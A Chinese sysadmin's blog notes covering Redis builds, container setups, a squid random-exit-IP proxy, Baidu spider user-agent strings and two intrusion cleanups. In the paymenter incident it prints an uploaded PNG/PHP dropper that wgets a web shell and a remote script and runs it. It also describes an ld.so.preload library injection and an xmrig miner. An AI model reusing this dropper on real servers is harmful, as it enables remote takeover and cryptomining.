redis-server8.4编译安装

debian源的版本比较老,而且redis-redisearch更老。

安装新版本ReJSON和RediSearch啥都有, 就是启动服务的时候官方service加载search就会卡住。

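# Build and install the latest tagged Redis release from source.
# Meant to be run as root from a script: the "exit 1" guards would close an
# interactive shell if the lines were pasted one by one.
# NOTE(review): the tarball is fetched over HTTPS but is not compared with a
# published checksum or signature; add that step if the build host matters.

# Work in a private directory instead of a predictable path under /tmp.
build_dir=$(mktemp -d) || exit 1
cd "$build_dir" || exit 1

# Ask the GitHub API for the latest release and keep only the version part of
# tag_name. --fail makes an HTTP error (for example rate limiting) yield an
# empty VER instead of an error document being parsed.
VER=$(curl -fsS https://api.github.com/repos/redis/redis/releases/latest \
  | grep tag_name \
  | grep -Po '[0-9]+\.[0-9]+\.[0-9]+.*(?=")')

# VER is remote data that ends up in a URL and a directory name: refuse an
# empty value or anything outside a plain version string.
case "$VER" in
  '' | *[!0-9A-Za-z.-]*)
    echo "unexpected release tag: '$VER'" >&2
    exit 1
    ;;
esac

wget "https://github.com/redis/redis/archive/refs/tags/${VER}.tar.gz" -O - | tar xz
cd "redis-${VER}" || exit 1

# Build switches read by the Redis makefiles.
# NOTE(review): INSTALL_RUST_TOOLCHAIN=yes presumably lets the build download a
# Rust toolchain on its own; confirm that is acceptable on this host.
export BUILD_TLS=yes
export BUILD_WITH_MODULES=yes
export INSTALL_RUST_TOOLCHAIN=yes
export DISABLE_WERRORS=yes
make -j "$(nproc)" all || exit 1
make install || exit 1
ln -s /usr/local/bin/redis-server /usr/bin/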

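# Register the bundled modules in redis.conf, one loadmodule line per module.
# A line is appended only when it is not already present, so running this
# again does not make Redis try to load the same module twice.
# loadmodule pulls native code into redis-server: keep the .so files and
# redis.conf owned by root and not writable by anyone else.
for module in redisbloom redisearch rejson redistimeseries; do
  line="loadmodule /usr/local/lib/redis/modules/${module}.so"
  grep -qxF -- "$line" /etc/redis/redis.conf 2>/dev/null \
    || printf '%s\n' "$line" >>/etc/redis/redis.conf
done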

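# Install a systemd unit for the self-built redis-server and start it.
# The heredoc delimiter is quoted so that $MAINPID reaches the unit file
# literally; with an unquoted delimiter the shell expands it to an empty
# string and ExecReload is written without a PID.
# NOTE(review): the service runs as root. Together with loadmodule this means
# any command execution inside Redis is root on the host; prefer a dedicated
# unprivileged account once the data and log directories are owned by it, and
# make sure redis.conf restricts "bind" and sets authentication.
cat >/etc/systemd/system/redis.service <<'EOF'
[Unit]
Description=Redis In-Memory Data Store
After=network.target

[Service]
ExecStart=/usr/local/bin/redis-server /etc/redis/redis.conf
ExecReload=/bin/kill -s HUP $MAINPID
Type=simple
User=root
Group=root
LimitNOFILE=10032
TimeoutStartSec=300
TimeoutStopSec=60

[Install]
WantedBy=multi-user.target
EOF

# Make systemd read the new unit file before enabling and starting it.
systemctl daemon-reload
systemctl enable redis --now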

 

/usr/local/bin/    #二进制目录
/etc/redis/redis.conf  #配置文件目录

 

# Modules
module:name=search,ver=80402,api=1,filters=0,usedby=[],using=[ReJSON],options=[handle-io-errors]
module:name=vectorset,ver=1,api=1,filters=0,usedby=[],using=[],options=[handle-io-errors|handle-repl-async-load]
module:name=ReJSON,ver=80400,api=1,filters=0,usedby=[search],using=[],options=[handle-io-errors]
module:name=bf,ver=80400,api=1,filters=0,usedby=[],using=[],options=[handle-io-errors]
module:name=timeseries,ver=80400,api=1,filters=0,usedby=[],using=[],options=[handle-io-errors]

 

官方安装文档地址:

https://redis.io/docs/latest/operate/oss_and_stack/install/build-stack/almalinux-rocky-9/
https://redis.io/docs/latest/operate/oss_and_stack/install/build-stack/debian-bookworm/
https://redis.io/docs/latest/operate/oss_and_stack/install/build-stack/ubuntu-noble/

vscode 配置备忘录

VScode扩展插件安装pretty-php

apt install php-cli php-mbstring -y  
apt install tilix -y
#macos配置文件路径
/Users/用户名/Library/Application\ Support/Code/User/settings.json

#Linux配置文件目录
/home/用户名/.config/Code/User/settings.json
{
    "workbench.colorTheme": "Default Light Modern",
    "editor.accessibilitySupport": "off",
    "editor.formatOnType": true,
    // ==== PHP ====
    "[php]": {
        "editor.defaultFormatter": "lkrms.pretty-php",
        "editor.formatOnSave": true
    },

    // ==== HTML ====
    "[html]": {
        "editor.defaultFormatter": "vscode.html-language-features",
        "editor.formatOnSave": true
    },
    // ==== TPL / 模板 ====
    "files.associations": {
        "*.tpl": "html",
        "*.tpl.php": "html"
    },
    "html.format.indentInnerHtml": true,
    "html.format.wrapLineLength": 600,
    "html.format.templating": true,
    "html.format.contentUnformatted": "script,style,pre,code,template,meta",

    // ==== 编辑器外观 ====
    "editor.fontFamily": "Menlo, Monaco, 'Courier New', JetBrains Mono, monospace",
    "editor.fontSize": 14,
    "continue.showInlineTip": false,
    "editor.tokenColorCustomizations": {},
    "editor.defaultFormatter": "lkrms.pretty-php",
    "editor.formatOnPaste": true,
    "css.format.braceStyle": "expand",
    "amazonQ.allowFeatureDevelopmentToRunCodeAndTests": {
        
    }
}

RediSearch和RedisJSON安装

# Build RediSearch and RedisJSON from source.
# NOTE(review): both repositories are cloned at whatever their default branch
# currently holds, not at a tagged release, so the result is not reproducible.

# Compiler toolchain and libraries installed before the build.
sudo apt update
sudo apt install -y \
    build-essential \
    cmake \
    g++ \
    git \
    libssl-dev \
    libboost-all-dev \
    libjemalloc-dev \
    pkg-config
# Second package set (no -y here, so apt asks for confirmation).
sudo apt install build-essential llvm cmake libclang1 libclang-dev cargo
git clone --recursive https://github.com/RediSearch/RediSearch.git
cd RediSearch
# Runs the repository's "setup" make target as root; read it before running.
sudo make setup
make build
# The working directory is still the RediSearch checkout at this point, so
# RedisJSON is cloned inside it.
git clone https://github.com/RedisJSON/RedisJSON.git
cd RedisJSON
make

 

编译太麻烦了从docker镜像直接拉现成的

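# Pull and start the prebuilt RediSearch image instead of compiling.
# The port is published on loopback only: no password is configured here, and
# "-p 6379:6379" would expose this Redis on every interface of the host.
# Publish it more widely only behind a firewall and with authentication set.
# NOTE(review): ":latest" is a moving tag; pin a version or digest so the same
# image is deployed every time.
podman pull docker.io/redislabs/redisearch:latest
podman run -d --name redisearch -p 127.0.0.1:6379:6379 docker.io/redislabs/redisearch:latest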

MariaDB找出占用CPU的sql查询

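#!/bin/bash
# List the SQL statements running on the MariaDB threads that use the most CPU.
# Arguments: $2 - number of threads to report (default 10); $1 is not used.
TOP_N=${2:-10}
case "$TOP_N" in
  '' | *[!0-9]*)
    echo "thread count must be a non-negative integer: $TOP_N" >&2
    exit 1
    ;;
esac

# Oldest process named exactly mysqld, falling back to mariadbd.
PID=$(pgrep -o -x mysqld)
[ -z "$PID" ] && PID=$(pgrep -o -x mariadbd)
if [ -z "$PID" ]; then
  echo "no mysqld or mariadbd process found" >&2
  exit 1
fi

# One batch-mode pass of top in thread view: skip the header lines, drop the
# row whose id equals the process id, sort by column 9 (CPU) and join the
# first TOP_N thread ids with commas.
TID=$(top -H -p "$PID" -b -n 1 \
  | tail -n +8 \
  | awk -v pid="$PID" '$1 != pid {printf "%s\t%s\n",$1,$9}' \
  | sort -k2 -nr \
  | head -n "$TOP_N" \
  | awk '{ print $1 }' \
  | paste -sd ',' -)

# TID is pasted into the SQL text below, so it must be digits and commas only;
# an empty list would also produce an invalid "IN ()".
case "$TID" in
  '' | *[!0-9,]*)
    echo "no usable thread ids found for PID $PID" >&2
    exit 1
    ;;
esac

# NOTE(review): a password given with -p on the command line is stored in this
# script and is visible to other local users in the process list while the
# client runs; an option file readable only by its owner (for example via
# --defaults-extra-file) avoids both.
mariadb -h'127.0.0.1' -P'3306' -u'root' -p'密码'  -e "SELECT * FROM information_schema.processlist WHERE tid IN ($TID) ORDER BY time DESC;"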

根据MariaDB的PID查询出占用CPU最高的线程TID,再根据TID去information_schema.processlist里面找出对应的sql查询。

KasmVNC的kasmweb项目

最近需遍历查看几十万个图片文件, 虽然能通过http进行遍历,但涉及到操作文件要另外写代码。

kasmweb的ubuntu-jammy-desktop镜像帮我省掉了很多事, 直接进去操作,整体很流畅。

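# Start the Kasm Ubuntu desktop container (web VNC on port 6901).
# VNC_PW has to be set in the calling shell first, so the container is never
# started with a well-known default password.
# NOTE(review): the container runs as root (--user 0:0), the host directory
# /www is mounted read-write, and port 6901 is published on every interface.
# Limit who can reach the port (firewall, or publish on 127.0.0.1 and put the
# reverse proxy in front).
podman run -d \
  --restart=unless-stopped \
  --name ubuntu-desktop \
  --hostname ubuntu-desktop \
  --shm-size=5120m \
  -p 6901:6901 \
  -e VNC_PW="${VNC_PW:?set VNC_PW to a strong password first}" \
  -e LANG=zh_CN.UTF-8 \
  -e LANGUAGE=zh_CN:zh \
  -e LC_ALL=zh_CN.UTF-8 \
  -v /www:/www \
  --user 0:0 \
  docker.io/kasmweb/ubuntu-jammy-desktop:1.18.0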

使用  --user 0:0 提权为root

-p是端口映射 

容器启动后访问 https://IP:6901 有条件的做个反向代理

默认访问用户名是kasm_user,密码则是 -e VNC_PW 参数设置的值

进入root方法

podman exec -it -u root ubuntu-desktop bash
sudo -i

出现401验证错误解决办法

podman exec -it -u root ubuntu-desktop bash
#进入容器后重置密码
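# Reset the KasmVNC passwords for both accounts (run inside the container).
VNC_PW=密码  # placeholder, replace with the real password
# kasmvncpasswd reads the password and its confirmation from stdin. printf with
# a fixed format passes the value through unchanged, whereas echo -e would
# interpret any backslash sequences contained in the password.
printf '%s\n%s\n' "$VNC_PW" "$VNC_PW" | kasmvncpasswd -u kasm_user -wo
printf '%s\n%s\n' "$VNC_PW" "$VNC_PW" | kasmvncpasswd -u kasm_viewer -r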

备份vscode TG数据办法

 

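# Copy the container's /opt to the host so it can be bind-mounted later.
mkdir -p /data/opt
# Container name and path are one argument ("name:path", no space between).
# The trailing "/." copies the contents of /opt into /data/opt; without it the
# existing target directory would receive a nested /data/opt/opt.
podman cp ubuntu-desktop:/opt/. /data/opt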
 
#重新创建容器加上参数
-v /data/opt:/opt \

重启容器

podman restart ubuntu-desktop

停止和删除容器

podman stop ubuntu-desktop
podman rm ubuntu-desktop

 

官方网址https://kasm.com/kasmvnc

docker镜像网址 https://hub.docker.com/r/kasmweb/ubuntu-jammy-desktop

 

 

百度常用UA头

Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)
Mozilla/5.0 (Linux;u;Android 4.2.2;zh-cn;) AppleWebKit/534.46 (KHTML,like Gecko) Version/5.1 Mobile Safari/10600.6.3 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)
Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)
Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)
Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)
Mozilla/5.0 (Linux;u;Android 4.2.2;zh-cn;) AppleWebKit/534.46 (KHTML,likeGecko) Version/5.1 Mobile Safari/10600.6.3 (compatible; Baiduspider/2.0;+http://www.baidu.com/search/spider.html)
Baiduspider ( http://www.baidu.com/search/spider.htm)
Baiduspider-image+(+http://www.baidu.com/search/spider.htm)
Mozilla/5.0 (compatible; Baiduspider/2.0;+http://www.baidu.com/search/spider.html)
Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html
Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html

thinkphp file cache文件数量疑似无限增长问题

发现缓存数量无限增多,好像是没有自动清除过期缓存,如果是SSD硬盘要注意大量文件读写问题导致过度消耗硬盘寿命。

最好还是redis缓存为好。

qcow2镜像fsck

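# Check and repair the first partition of a qcow2 image through an NBD device.
# Do this only while no VM is using the image; fsck -y applies every proposed
# repair without asking.
modprobe nbd max_part=8
# The format is stated explicitly so qemu-nbd does not guess it from the file
# contents, which matters when the image comes from a guest you do not control.
qemu-nbd --format=qcow2 --connect=/dev/nbd0 /path/to/disk.qcow2
#fdisk -l /dev/nbd0
fsck -y /dev/nbd0p1
qemu-nbd --disconnect /dev/nbd0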

jsjiami.com.v7-v6-v5解密

提前安装好git和curl/wget

github项目https://github.com/echo094/decode-js

安装nodejs https://nodejs.org/en/download

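# Install nvm (installer pinned to tag v0.40.3) and then Node.js 22.
# The installer is saved to a temporary file before it is run: --fail keeps an
# HTTP error page from being executed as a script, a partial download is never
# piped into bash, and the file can be read first.
nvm_installer=$(mktemp) \
  && curl -fsSL -o "$nvm_installer" https://raw.githubusercontent.com/nvm-sh/nvm/v0.40.3/install.sh \
  && bash "$nvm_installer"
[ -n "$nvm_installer" ] && rm -f -- "$nvm_installer"
# Load nvm into the current shell, then install Node.js.
\. "$HOME/.nvm/nvm.sh"
nvm install 22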

 

拉取decode-js安装依赖

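# Fetch decode-js and install its dependencies.
git clone https://github.com/echo094/decode-js
cd decode-js || exit 1
# Dependencies are installed with npm; "node i" would try to run a file named "i".
# NOTE(review): npm install runs the package's install scripts, so do this as
# an unprivileged user.
npm install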

 

jsjiami.com.v6为例子

npm run decode -- -t sojson  -i   加密脚本.js -o 明文.js  

AlmaLinux出现libutilkeybd.so报错

最近接了几个运维的活, 更新内核的时候 dracut生成 initrd失败,大量出现关键词libutilkeybd.so

追溯文件日期是9月21日,起初还以为是AlmaLinux的问题。

除了dracut,用ldd和lsof也能看到被注入。

清空ld.so.preload和删除文件后系统正常了。不过这只是去掉了被预加载的库,它是怎么写进去的还没有查清,这台机器应按已被入侵处理:排查入口、更换凭据,条件允许就重装。

 

ldd /usr/lib64/libssl.so.3.2.2
	linux-vdso.so.1 (0x00007ffdba2f8000)
	/var/adm/ab806535-6c06-4d89-a103-3568a19b24e8/kernel/libutilkeybd.so (0x00007f9486200000)
	libcrypto.so.3 => /lib64/libcrypto.so.3 (0x00007f9485c00000)
	libc.so.6 => /lib64/libc.so.6 (0x00007f9485800000)
	libdl.so.2 => /lib64/libdl.so.2 (0x00007f94864d5000)
	libz.so.1 => /lib64/libz.so.1 (0x00007f94864bb000)
	/lib64/ld-linux-x86-64.so.2 (0x00007f94865cb000)
lsof: no pwd entry for UID 101
lsof: no pwd entry for UID 101
lsof: no pwd entry for UID 101
lsof: no pwd entry for UID 101
lsof: no pwd entry for UID 101
lsof: no pwd entry for UID 101
lsof: no pwd entry for UID 101
lsof: no pwd entry for UID 101
lsof: no pwd entry for UID 101
lsof: no pwd entry for UID 101
lsof: no pwd entry for UID 101
bash       7749                    root  mem       REG              259,4    33816   11535609 /var/adm/ab806535-6c06-4d89-a103-3568a19b24e8/kernel/libutilkeybd.so
lsof      36787                    root  mem       REG              259,4    33816   11535609 /var/adm/ab806535-6c06-4d89-a103-3568a19b24e8/kernel/libutilkeybd.so
grep      36788                    root  mem       REG              259,4    33816   11535609 /var/adm/ab806535-6c06-4d89-a103-3568a19b24e8/kernel/libutilkeybd.so
lsof      36789                    root  mem       REG              259,4    33816   11535609 /var/adm/ab806535-6c06-4d89-a103-3568a19b24e8/kernel/libutilkeybd.so

解决方法

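# Remove the injected preload library, keeping a copy for later analysis.
# Hashes and copies are taken first because deleting the files also deletes
# the only sample of what was loaded into every process.
# NOTE(review): while the library is still preloaded, the tools used here may
# themselves be affected by it; treat the result as best effort and re-check
# the disk from a clean boot medium.
evidence_dir=${EVIDENCE_DIR:-/root/ld-preload-evidence}  # example location, change as needed
install -d -m 0700 -- "$evidence_dir"
for f in /etc/ld.so.preload /var/adm/*/kernel/libutilkeybd.so; do
  [ -e "$f" ] || continue
  sha256sum -- "$f" >>"$evidence_dir/sha256sums.txt"
  cp -a --parents -- "$f" "$evidence_dir/"
done

rm -f /var/adm/*/kernel/libutilkeybd.so
# Empty the preload list so the dynamic loader injects nothing.
: >/etc/ld.so.preload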

squid随机出口IP配置

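# Install squid and prepare its log, cache and core-dump directories.
yum -y install squid
mkdir -p /var/log/squid/{logs,coredump_dir,cache_dir}
# "owner:group" is the supported separator; the dotted form is deprecated.
chown -R squid:squid /var/log/squid/
# Write one tcp_outgoing_address line per address reported by "hostname -I".
# The unquoted expansion is intentional: it splits the list into one word per
# address. The list holds every configured address, so review ip.list before
# squid uses it.
for addr in $(hostname -I); do
  printf 'tcp_outgoing_address %s random_ip\n' "$addr"
done >/etc/squid/ip.list
systemctl enable squid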


# Write /etc/squid/squid.conf, replacing any existing file.
# The heredoc delimiter is unquoted, but the text below contains no "$" or
# backquote, so it is written out unchanged.
# Access rules as written: requests are refused for the cache manager, for
# ports outside Safe_ports and for CONNECT to anything but port 443; after
# that only sources matching the "allowip" ACL are allowed and everything else
# is denied.
# The configuration includes /etc/squid/allow.list and /etc/squid/ip.list;
# presumably squid will not start until both files exist, so create the
# allowlist before starting the service - TODO confirm.
# The Via and X-Forwarded-For request headers are removed from forwarded
# requests.
cat>/etc/squid/squid.conf<<EOF
acl manager proto cache_object
acl localhost src 127.0.0.1/32 ::1
acl to_localhost dst 127.0.0.0/8 0.0.0.0/32 ::1
#白名单
include /etc/squid/allow.list

acl SSL_ports port 443
acl Safe_ports port 80          # http
acl Safe_ports port 21          # ftp
acl Safe_ports port 443         # https
acl Safe_ports port 70          # gopher
acl Safe_ports port 210         # wais
acl Safe_ports port 1025-65535  # unregistered ports
acl Safe_ports port 280         # http-mgmt
acl Safe_ports port 488         # gss-http
acl Safe_ports port 591         # filemaker
acl Safe_ports port 777         # multiling http
acl CONNECT method CONNECT

# set out - ip 配置出口IP
#acl localnet src 0.0.0.0/0

acl random_ip random 1/2
acl random_ip random 1/3
acl random_ip random 1/4
acl random_ip random 1/5
acl random_ip random 1/6
acl random_ip random 1/7
acl random_ip random 1/8
acl random_ip random 1/9
acl random_ip random 1/10
acl random_ip random 1/11
acl random_ip random 1/12
acl random_ip random 1/13
acl random_ip random 1/14
acl random_ip random 1/15
acl random_ip random 1/16
acl random_ip random 1/17
acl random_ip random 1/18
acl random_ip random 1/19
acl random_ip random 1/20

server_persistent_connections off

http_access deny manager
http_access deny !Safe_ports
http_access deny CONNECT !SSL_ports
http_access allow allowip
http_access deny all

# 设置代理端口
http_port 3228
include /etc/squid/ip.list

dns_nameservers 8.8.8.8
visible_hostname aliserver

request_header_access Via deny all
request_header_access X-Forwarded-For deny all

cache_mem 100 MB
cache_swap_low 90
cache_swap_high 95
cache_dir ufs /var/log/squid/cache_dir 100 16 256
cache_access_log /var/log/squid/logs/access.log
cache_log /var/log/squid/logs/cache.log
cache_store_log /var/log/squid/logs/store.log
coredump_dir /var/log/squid/coredump_dir
pid_filename /var/log/squid/squid.pid
# Add any of your own refresh_pattern entries above these.
refresh_pattern ^ftp:           1440    20%     10080
refresh_pattern ^gopher:        1440    0%      1440
refresh_pattern -i (/cgi-bin/|\?) 0     0%      0
refresh_pattern .               0       20%     4320
EOF

添加白名单IP段

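#######################################
# Append one source network to the squid allowlist.
# Arguments: $1 - IPv4/IPv6 address or CIDR range
# Outputs:   appends "acl allowip src <range>" to /etc/squid/allow.list
# Returns:   0 on success, 1 when the argument is empty or contains anything
#            other than address characters
#######################################
addlist() {
  # The value is written into a file that squid.conf includes, so whitespace,
  # newlines or other text must not be able to add extra configuration lines.
  case "$1" in
    '' | *[!0-9A-Fa-f:./]*)
      echo "addlist: not an address or CIDR range: '$1'" >&2
      return 1
      ;;
  esac
  printf 'acl allowip src %s\n' "$1" >>/etc/squid/allow.list
}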
addlist 123.456.789.0/24  #添加白名单IP段

 

 

 

nginx分支版本Angie

官方网站https://cn.angie.software/

现成二进制包https://cn.angie.software/angie/docs/installation/oss_packages/

官方网站上介绍是由前 nginx 开发者创建

 

官方介绍是支持Prometheus、ACME、HTTP3,这几个功能太实用了,lua、njs都已经打包好可用。

 

目前不知道angie和freenginx之间是啥关系。

插个眼amphp

 

 

https://amphp.org/websocket-server

软RAID监控脚本

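#!/bin/bash

# Report the health of one md software-RAID array.
# Exit status: 0 healthy, 1 array missing or not active, 2 problematic state,
# 3 state not recognised.

# Define the array device
ARRAY="/dev/md10"

# Query the array once and reuse the output; a failing mdadm call means the
# array is not active or does not exist.
if ! DETAIL=$(mdadm --detail "$ARRAY" 2>/dev/null); then
    echo "ERROR: Array $ARRAY is not active or does not exist."
    exit 1
fi

# Take the value of the "State :" line only. The pattern is anchored so that
# other lines that merely contain the word "State" are not picked up.
# tr removes all whitespace, so "clean, degraded" becomes "clean,degraded".
STATUS=$(printf '%s\n' "$DETAIL" | awk -F': ' '/^[[:space:]]*State :/ {print $2}' | tr -d '[:space:]')

# Problem states are tested first because a degraded array still reports
# "clean" or "active" in the same field. FAILED and "Not Started" are also
# states mdadm can report; they are treated as problems rather than unknown.
if [[ "$STATUS" =~ (degraded|recovering|resyncing|inactive|FAILED|NotStarted) ]]; then
    echo "⚠️  WARNING: Array $ARRAY is in a problematic state! -> $STATUS"
    exit 2
elif [[ "$STATUS" =~ (clean|active) ]]; then
    echo "✅ INFO: Array $ARRAY is healthy ($STATUS)"
    exit 0
else
    echo "❓ UNKNOWN: Unable to determine RAID state ($STATUS)"
    exit 3
fi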

paymenter财务主机计费系统有上传漏洞

上半年装了一个体验一下丢着一直没管,今天上去发现有挖矿进程。

 

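漏洞具体细节:https://cve.imfht.com/detail/CVE-2025-58048

从下面的lsof输出可以看到,挖矿进程的工作目录就是工单附件上传目录,里面还有一个被上传的.php文件;处理时除了升级paymenter,还应禁止该上传目录执行PHP,并清查paymenter用户名下的其他文件和进程。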

 

root@localhost:/tmp# lsof -p 1479735 
COMMAND     PID      USER   FD      TYPE             DEVICE SIZE/OFF     NODE NAME
xmrig   1479735 paymenter  cwd       DIR              254,3      117 15784149 /home/paymenter/storage/app/public/ticket-attachments
xmrig   1479735 paymenter  rtd       DIR              254,3      298      128 /
xmrig   1479735 paymenter  txt       REG              254,3  8334576 15784153 /home/paymenter/storage/app/public/ticket-attachments/xmrig
xmrig   1479735 paymenter  mem       REG              254,3      561  3231722 /usr/share/zoneinfo/Asia/Shanghai
xmrig   1479735 paymenter  mem       REG               0,14          70684614 anon_inode:[io_uring] (stat: No such file or directory)
xmrig   1479735 paymenter    0r      CHR                1,3      0t0        4 /dev/null
xmrig   1479735 paymenter    1w     FIFO               0,13      0t0 70686037 pipe
xmrig   1479735 paymenter    2w     FIFO               0,13      0t0 70685837 pipe
xmrig   1479735 paymenter    3u  a_inode               0,14        0     1048 [eventpoll:9,11,13,14,15]
xmrig   1479735 paymenter    4u     unix 0x00000000bd7e1641      0t0    26784 type=STREAM (CONNECTED)
xmrig   1479735 paymenter    5u  a_inode               0,14        0 70684614 [io_uring]
xmrig   1479735 paymenter    6r      REG              254,3      215 15784150 /home/paymenter/storage/app/public/ticket-attachments/XBrs38qG8DslCb8cOGWntcvNOceYQsu2AvFiQYDw.php
xmrig   1479735 paymenter    7r     FIFO               0,13      0t0 70684615 pipe
xmrig   1479735 paymenter    8w     FIFO               0,13      0t0 70684615 pipe
xmrig   1479735 paymenter    9r     FIFO               0,13      0t0 70684616 pipe
xmrig   1479735 paymenter   10w     FIFO               0,13      0t0 70684616 pipe
xmrig   1479735 paymenter   11u  a_inode               0,14        0     1048 [eventfd:17]
xmrig   1479735 paymenter   12r      CHR                1,3      0t0        4 /dev/null
xmrig   1479735 paymenter   13u  a_inode               0,14        0     1048 [eventfd:25]
xmrig   1479735 paymenter   14u  a_inode               0,14        0     1048 [eventfd:27]
xmrig   1479735 paymenter   15u     IPv4          102158557      0t0      TCP XXXXXXX:53580->252.104.20.157.sg.kuroit.com:https (ESTABLISHED)
root@localhost:/tmp# cat /home/paymenter/storage/app/public/ticket-attachments/XBrs38qG8DslCb8cOGWntcvNOceYQsu2AvFiQYDw.php
@PNG
<?php 
system("wget https://raw.githubusercontent.com/flozz/p0wny-shell/refs/heads/master/shell.php");
system("wget https://bestvip.pt/storage/ticket-attachments/script.sh");
system("bash script.sh")
 ?>
